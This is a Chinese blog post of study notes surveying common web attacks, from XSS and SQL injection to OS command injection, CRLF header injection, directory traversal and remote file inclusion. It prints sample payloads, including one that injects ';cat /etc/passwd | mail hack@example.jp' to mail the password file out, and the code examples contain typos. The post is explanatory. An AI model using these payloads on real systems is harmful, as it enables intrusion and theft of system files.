HTTP 攻击

最新推荐文章于 2024-09-07 07:00:00 发布
最新推荐文章于 2024-09-07 07:00:00 发布
阅读量4.7k 收藏 10
点赞数 2
分类专栏: 杂文 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kangsf1989/article/details/88327364
版权

一、XSS攻击,通过script 代码进行攻击。

危害:可以实现对网站的非法访问提示弹框或者引导用户把提交信息指定非法网站,记录后。再返回原网站。

事例:http://localhost/index.php?q="<script>alert('你被攻击了')</script>"

二、SQL攻击,通过可以执行SQL的获取参数,进行特殊处理。

危害:可以实现对数据库的相关数据获取。

事例:select *  from test   where name='aa' --- " and del=1";

可以实现该有的查询and del=1 被注释,结果返回所有name=aa的数据

三、OS攻击,指针对程序操作sheel脚本处理加以特殊处理。

危害:获取相关信息,最经典事例,发达邮件。

my $adr = $q->param('mailaddress');

open(MALL, "| /user/sbin.sendmail $adr");

print MAIL "From: info@example.com\n";

可以把指定邮件修改成还有分号的邮件地址,例如:;cat /etc/passwd | mail hack@example.jp

程序会变成:/usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp

程序会把linux下所有的用户名以邮件形式发送给 hack@example.jp。

四、HTTP首部注入攻击

属于被动攻击模式,只有向首部主体添加的内容时才有可能实现功击。

事例:

localtion:http://localhost/a.php?q=12345

set-cookie:uid=12345

通过修改某字段需要输出的值进行攻击。

危害:设置任何cookie 信息

           重定向至任意URL

            显示任意的主体(http响应截断攻击)

注:http响应截断攻击是用在HTTP部注入的一种攻击,攻击顺序相同,但是要将两个%0D%0A%0D%0A并排插入字符串后发达,利用这两个连续的换行就可以作出HTTP首部与主体分隔的空行 ,这样显示伪造的主体,达到攻击的目的,再让用户输入信息,可达到和跨站脚本攻击相同的效果。

五、邮件首部注入攻击

邮件首部注入是指web应用中的邮件发送攻能,攻击者通过向邮件首部to或者subject内任意添加非法内容发起的攻击,利用存在安全漏洞的web网站,可以任意邮件发送广告或者病毒邮件。

事例:

bob@example.com%0D%0ADcc; user@example.com

%0D%0ADcc为换行,一旦表格接收了这个换行符,就可以实现对另一个邮件的追发,原本是无法指定的。

六、目录遍历攻击

是指本无意公开的目录,通过非法截断后,达成访问目的一种攻击。

事例:

http://localhost/a.php?log=../../etc/passwd

七、运程文件包含漏洞

指当前脚本需要从其他文件读取内容时,利用外部服务器的url充当依赖文件,让脚本读取之后,可以任意运行脚要的一种攻击。

主要针对php中include或者require来说,5.2之后默认此功能无效。

http://localhost/a.php?mod =http://www.baidu.com/cmd.php&cmd=ls

八、程序设计缺陷引发的的安全一漏洞

九、不正确的错误消息处理。

十、会话劫持

十一、点击劫持

十二 、dos攻击

让服务器呈现一种停止状态,主要利用资源过载,实现停止 。

利用安全漏洞让服务器停止。

十三、后门程序

例如开过过程中调试程序的debug处理。

 

 

 

 

kangsf1989
关注
专栏目录
HTTP攻击与防范
12-02
了解HTTP请求欺骗攻击带来的危险性,掌握HTTP请求欺骗攻击方法,掌握防范攻击的方法。
HTTP攻击检测
11-11
### HTTP攻击检测关键技术研究 #### 一、引言 随着互联网技术的发展,网络攻击的方式也在不断进化。传统的网络层和传输层的攻击逐渐减少,而应用层的攻击却日益增多。这种趋势的原因主要包括两个方面:一是网络...
HTTP攻击实战以及防御手段
爱吃仡坨的Blog
08-07 1125
http攻击实战以及简略的防御手段
设计模式-观察者模式-Observer Pattern
最新发布
wesigj的博客
09-07 867
观察者模式的优点包括实现了观察者和被观察者之间的解耦,增加了程序的可扩展性,并且可以动态地添加或移除观察者。:观察者模式能够将被观察者(Subject)和观察者(Observer)解耦,使得被观察者的改变不会直接影响到观察者,两者之间的依赖关系降低。:在需要实现通知和消息传递的系统中,观察者模式可以用来通知用户或系统组件关于状态变化的信息,如电子邮件客户端中的新邮件通知。:在观察者模式中,如果一个观察者在更新时发生错误,可能会影响到其他观察者的更新,这需要在设计时考虑错误处理机制。
HTTP攻击方式
程序小白进阶之路
06-25 300
参考:https://www.cnblogs.com/xiaohuochai/p/6207488.html
HTTP——十一、Web的攻击技术
热门推荐
钟言的博客
08-09 1万+
本篇学习自图解HTTP的第十一章,Web的攻击技术,详细内容包含了针对Web的攻击技术 1、HTTP 不具备必要的安全功能 2、在客户端即可篡改请求 3、针对Web应用的攻击模式 因输出值转义不完全引发的安全漏洞 1、跨站脚本攻击 2、SQL 注入攻击 3、OS命令注入攻击 4、HTTP首部注入攻击 5、邮件首部注入攻击 6、目录遍历攻击 7、远程文件包含漏洞 因设置或设计上的缺陷引发的安全漏洞 1、强制浏览 2、不正确的错误消息处理 3、开放重定向四、因会话管理疏忽引发的安全漏洞1、会话劫持 2、会话等等
前端学HTTP之web攻击技术
weixin_34146986的博客
12-21 255
前面的话   简单的HTTP协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击的对象。应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标。本文将详细介绍攻击web站点的手段   总括   与最初的设计相比,现今的Web网站应用的HTTP协议的使用方式已发生了翻天覆地的变化。几乎现今所有的Web网站都会使用会话(session)管理、加密处理等安全性方面...
软件安全测试·DoS·HTTP慢速攻击
06-22
"软件安全测试·DoS·HTTP慢速攻击" 一、攻击原理 HTTP 慢速攻击是一种DoS攻击方式,依赖于 HTTP 协议的设计机制。攻击者可以通过发送非常低速率的 HTTP 请求,使服务器资源busy等待其余的数据,从而导致服务器...
HTTP攻击视频资料及PDF文档(百度云下载)
09-28
1. HTTP攻击是什么 2. 为什么需要HTTP攻击 3. HTTP攻击可能发生的场景 4. HTTP攻击的总体利用思路与检测实现思路 HTTP攻击是什么 Blind Attack , Blind Inject Everything HTTP攻击,凡是 不直接 ...
利用HTTPhost头攻击的技术
01-30
开发人员一般是依赖HTTP Hostheader(比如在php里是_SERVER["HTTP_HOST"]),而这个header很多情况下是靠不住的。而很多应用是直接把这个值不做html编码便输出到了页面中,比如:还有的地方还包含有secretkey和token...
HTTP Web的攻击技术
qq_38362049的博客
07-11 937
一.针对Web的攻击技术1.HTTP不具备必要的安全功能2.在客户端可篡改请求主动攻击:SQL注入攻击、OS注入攻击攻击者通过直接访问Web应用,把攻击代码传入攻击模式。主要攻击服务器上的资源被动攻击:跨站脚本攻击HTTP首部注入攻击、邮件注入攻击、会话固定攻击、跨站点请求伪造利用圈套策略执行代码的攻击模式。在被动攻击过程中,攻击者不直接对目标Web应用访问发起攻击。(1)攻击者诱导用户触发已设...
http攻击&&Ssl相关介绍
永不垂头的博客
08-25 180
http攻击&&Ssl相关介绍 http攻击https:CIA三要素 解决的是信息传输过程中数据被篡改。 加密:对称、非对称、单项。 http攻击方法 降级 3.0 2.0 解密 证书伪造,明文 协议漏洞 实现方法的漏洞 配置 Ssl 非对称的 Rsa Ecc 对称的 Des 3des Aes Rc4 Ssl是用不同的对称,非对称,单项 服务区为了提供兼容行,支持过时的加密方式 协商过程强制降级强度 强的处理器 购买云资源 后续操作请持续关注哦!!! 了解更多请
http慢速连接攻击
banxia_的博客
05-24 5324
http慢链接的攻击方法 首先我们来下载slowhttptest . slowhttptest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者ddos的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击攻击方式,包括slowloris, Slow HTTP POST, Slow Read
什么是HTTP协议攻击
weixin_68778384的博客
07-17 331
HTTP协议攻击是指利用HTTP(HyperText Transfer Protocol,超文本传输协议)的特性和漏洞,对网站、Web应用或服务器发起的一系列恶意行为,旨在破坏、窃取数据、拒绝服务或进行其他形式的网络攻击HTTP协议作为Web服务的基础协议,在客户端(如浏览器)和服务器之间传输信息,使得我们能够浏览网页、提交表单、下载文件等。然而,其无状态性和基于请求-响应的模型也带来了不少安全隐患。
HTTP协议与攻击
NickWU博客
12-28 8051
以下内容为阅读《图解HTTP》后整理 文章目录Web基础TCP/IPHTTP协议概念HTTP协议是个无状态协议HTTP方法持久连接节省通信量Cookie状态管理HTTP报文内的HTTP信息 Web基础 首先总所周知,HTTP是建立在TCP/IP之上的,也就是说,HTTP是TCP/IP的一个子集。 TCP/IP TCP/IP分四层:应用层、传输层、网络层、数据链路层。 而网络是分七层协议:7 应用层...
图解http,补充攻击方式。
weixin_45960266的博客
12-04 335
在看图解http时候看到一些之前不知道的攻击方式,这里作为开阔视野,记录一下: 1.HTTP首部注入攻击 攻击形式是在响应部首加入换行符,借此去更改响应部首以及内容主体。 例如:在选定了的响应部首内,插入换行符之后,再添加, 再次之后可以添加自己想要输出的内容,同时也会把原本的网页内容给注释掉。 2.邮件首部注入攻击 通过利用web应用的邮件发送功能的TO、subject,等功能实现攻击 知识补充 注入原理: 这个地方首先要说一下邮件的结构,分为信封(MAIL FROM、RCPT TO)、头部(From,T
HTTP详解(6)web攻击技术
Aldeo
11-17 259
web攻击技术的总结如下。
http慢速攻击原理和防护方法
focus on security
12-10 5675
http慢速攻击是利用Http现有合法机制,在建立了与Http服务器的连接后,尽量长时间保持该连接,不释放,达到对http服务器的攻击。常见攻击有两种: slow post:攻击者通过发送post报文向服务器请求提交数据,将总报文长度设置为一个很大是数值,但是在随后的数据发送中,每次只发送很小的白问,这样导致服务器端一直等待攻击者发送数据。 slow headers: 攻击者通过get或post向服务器建立连接,但是http头字段不发送结束符,之后发送其他字段进行保活。服务器会一直等待头信息中结束符而导致
常见HTTP攻与防
jxguoyan的专栏
03-29 1059
1. header name和value中出现CRLF字符 在header中嵌入CRLF(回车换行)字符是一种常见的攻击手段。攻击者嵌入CRLF以后,使服务器对HTTP请求发生错误判断,从而执行攻击者的恶意代码。事实上,现在的servlet引擎如tomcat已经可以防御这种攻击。 当然,有的应用服务器还不可以防御,所以,可能通过增加过滤器类似技术来进行处理,避免此类攻击。 2. st
android http攻击
10-12
Android HTTP攻击是指针对Android操作系统上的HTTP通信进行攻击的行为。Android是目前最流行的移动操作系统之一,其应用程序通常使用HTTP协议与服务器进行通信。攻击者可以利用漏洞或弱点来干扰、伪装或控制这些通信过程。 一种常见的Android HTTP攻击是中间人攻击攻击者可以在用户和服务器之间插入自己的设备或恶意软件,并监视和修改通信内容。这可能会导致用户信息被窃取或篡改。 另一种常见的攻击是拒绝服务(DoS)或分布式拒绝服务(DDoS)攻击攻击者发送大量请求来占用服务器资源,使正常用户无法访问服务。这种攻击可以通过合理的流量监测和防护措施来缓解。 此外,攻击者还可以利用网络嗅探工具来截取传输的敏感数据,如用户名、密码等,从而进行身份欺骗或其他恶意行为。 为了防范Android HTTP攻击,开发者和用户可以采取以下措施: 1. 使用HTTPS协议来加密HTTP通信,确保通信内容的安全性和完整性。 2. 应用程序开发者要进行安全编码,避免在传输敏感数据时使用明文传输。 3. 定期更新操作系统和应用程序,以修复已知的安全漏洞,并保持软件的最新版本。 4. 使用可靠的安全软件,如防火墙和反病毒软件,来阻止恶意软件的入侵。 5. 用户要谨慎下载和安装来自不可信来源的应用程序,以防止恶意软件的安装。 总之,Android HTTP攻击是一种威胁用户隐私和数据安全的行为,需要开发者和用户共同努力来保护移动设备和通信安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值